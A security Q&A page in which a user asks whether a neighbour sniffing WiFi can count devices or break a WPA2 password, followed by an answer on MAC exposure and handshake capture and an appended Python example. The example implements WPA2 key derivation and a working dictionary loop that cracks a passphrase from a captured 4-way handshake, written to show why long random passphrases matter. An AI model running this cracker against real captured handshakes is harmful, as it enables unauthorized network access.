
I'm a noob in home security and networking. I suspect one of my neighbors is sniffing packets destined for my WiFi router. I have many questions about this:

  1. Will they be able to identify the number of devices I have connected to the router?
  2. If yes, is there a way for me to hide the device details from packet sniffers?
  3. Will they be able to break my WiFi password if they are aware of web pages I visit regularly, like a specific YouTube channel, etc.?
multithr3at3d
skab

1 Answer


When using WiFi, i.e. 802.11, as the link layer, the frame headers aren't encrypted, revealing three MAC addresses (actually four, but the fourth is only used in ad-hoc mode). If you are more interested in the theory and what it looks like, you could read my more detailed answer to the question "What does WPA2 traffic look like to a packet sniffer that is not connected to the network?"

This answers your first two questions:

  1. From the MAC addresses it is possible to know the number of devices and mostly their manufacturers, too, as the first three octets are the organizationally unique identifier (OUI). The number of different MAC addresses will reveal the number of devices connected to the access point.

  2. It is impossible to hide this information. While it is easy to spoof a MAC address with computers, that does not work for all IoT devices. Also, spoofing and even changing the MAC address from time to time does not really hide the number of devices connected at a certain time. It can merely hide the vendor.

The last question depends on the encryption you are using. I assume you have properly protected your network with WPA2, and as a home user it is probably WPA2-PSK (pre-shared key), hopefully with AES (see e.g. Chris Hoffman: Wi-Fi Security: Should You Use WPA2-AES, WPA2-TKIP, or Both? for more details on why this matters).

  3. With WPA2-PSK, it is not possible to deduce the pre-shared key from the encrypted data. It does not matter whether someone sniffing your network does know the sites or not, as this information is within the encrypted payload.

However, it works the other way around. If an attacker can get your pre-shared key, i.e. your "WiFi password", it will be possible to decrypt everything that has been captured from the network, given the capture contains the 4-way handshake. It is easy to deauthenticate a device, forcing a new 4-way handshake, so it is wise to always assume the attacker has it. It is also possible to try and brute-force the PSK against the captured traffic. For these reasons, you should use a long, random PSK and not keep it in a visible place.

Esa Jokinen
  • Don't forget about WPA3! – multithr3at3d Oct 31 '20 at 14:07
  • 2
    @multithr3at3d: Can't put everything in one answer. While WPA3 solves many security problems including deauthentication attacks, the frame headers are still unencrypted, and they have to be. WPA3 has been mandatory for new Wi-Fi certifications since July 2020, but it will take the some time before it's widespread in home networks. I think it's still, as of Oct 2020, best to assume a typical home has WPA2. – Esa Jokinen Oct 31 '20 at 14:28
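The answer's last paragraph says a captured 4-way handshake lets an attacker brute-force the PSK offline, and that the fix is a long, random passphrase. The added example below (written for this page, not code from the answer or from any cracking tool) shows why, by carrying out the standard WPA2 derivation in both directions: the client turns the passphrase into the PSK with PBKDF2-HMAC-SHA1 over the SSID (4096 iterations), expands it to the PTK with the 802.11i PRF using both MAC addresses and both nonces, and signs handshake message 2 with the first 16 bytes (the KCK); the attacker, who saw the SSID, both MACs, both nonces and the MIC in the clear, repeats exactly that computation per guess and compares MICs. The SSID, MACs, nonces, passphrases and wordlist are constructed for the example, and the EAPOL-Key frame is a minimal one with no key data.

```python
"""WPA2-PSK: passphrase -> PSK -> PTK -> EAPOL MIC, and the offline guess loop it enables.

Added example with constructed values; the derivation steps are the standard WPA2 ones.
"""
import hashlib
import hmac
import struct


def psk_from_passphrase(passphrase, ssid):
    """PSK (= PMK for WPA2-Personal): PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, length):
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || counter) blocks."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range((length + 19) // 20)
    )
    return out[:length]


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)   # KCK = first 16 bytes, KEK next 16, TK last 16


MIC_OFFSET = 81   # byte offset of the Key MIC field inside the EAPOL-Key frame built below


def build_eapol_msg2(snonce):
    """Minimal EAPOL-Key message 2 (constructed): RSN descriptor, Key Info = MIC|Pairwise|version 2."""
    body = struct.pack(">BHH", 2, 0x010A, 16)             # descriptor type, Key Info, key length (CCMP)
    body += struct.pack(">Q", 1)                           # replay counter
    body += snonce + bytes(16) + bytes(8) + bytes(8)       # key nonce, key IV, RSC, key ID
    body += bytes(16) + struct.pack(">H", 0)               # MIC (zero until signed), key data length
    return struct.pack(">BBH", 2, 3, len(body)) + body     # EAPOL version 2, packet type 3 = EAPOL-Key


def eapol_mic(kck, frame):
    """HMAC-SHA1-128 over the whole EAPOL frame with the MIC field zeroed (key descriptor version 2)."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def supplicant_message2(passphrase, ssid, aa, spa, anonce, snonce):
    """Client side: message 2 carrying a MIC computed from the real passphrase."""
    ptk = derive_ptk(psk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
    frame = build_eapol_msg2(snonce)
    mic = eapol_mic(ptk[:16], frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack_handshake(capture, wordlist):
    """Attacker side: every input but the passphrase was sniffed in the clear, so test guesses offline."""
    target_mic = capture["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for guess in wordlist:
        pmk = psk_from_passphrase(guess, capture["ssid"])          # the 4096-round PBKDF2 is the cost per guess
        ptk = derive_ptk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol"]), target_mic):
            return guess
    return None


# Constructed handshake parameters (fixed nonces so the example is reproducible).
SSID = "HomeNet"
AA = bytes.fromhex("001122aabb01")     # authenticator (AP) MAC
SPA = bytes.fromhex("0a1b2c3d4e5f")    # supplicant (client) MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WEAK_PASSPHRASE = "sunflower2020"
STRONG_PASSPHRASE = "jX9#vQ2m!pL8@zR4wT6y"
WORDLIST = ["password", "12345678", "qwertyuiop", "sunflower2020"]


def make_capture(passphrase):
    """What a sniffer holding the 4-way handshake has: all cleartext fields plus the MIC'd message 2."""
    return {"ssid": SSID, "aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": supplicant_message2(passphrase, SSID, AA, SPA, ANONCE, SNONCE)}


if __name__ == "__main__":
    print("weak PSK recovered:", crack_handshake(make_capture(WEAK_PASSPHRASE), WORDLIST))
    print("random PSK recovered:", crack_handshake(make_capture(STRONG_PASSPHRASE), WORDLIST))
```

The loop never touches the encrypted payload, so what the victim browses is irrelevant; only the passphrase's guessability matters. Each guess costs one PBKDF2 run of 4096 HMAC-SHA1 rounds plus a handful of HMACs, cheap enough that a dictionary passphrase falls quickly, while a long random PSK is not in any wordlist and the loop returns nothing.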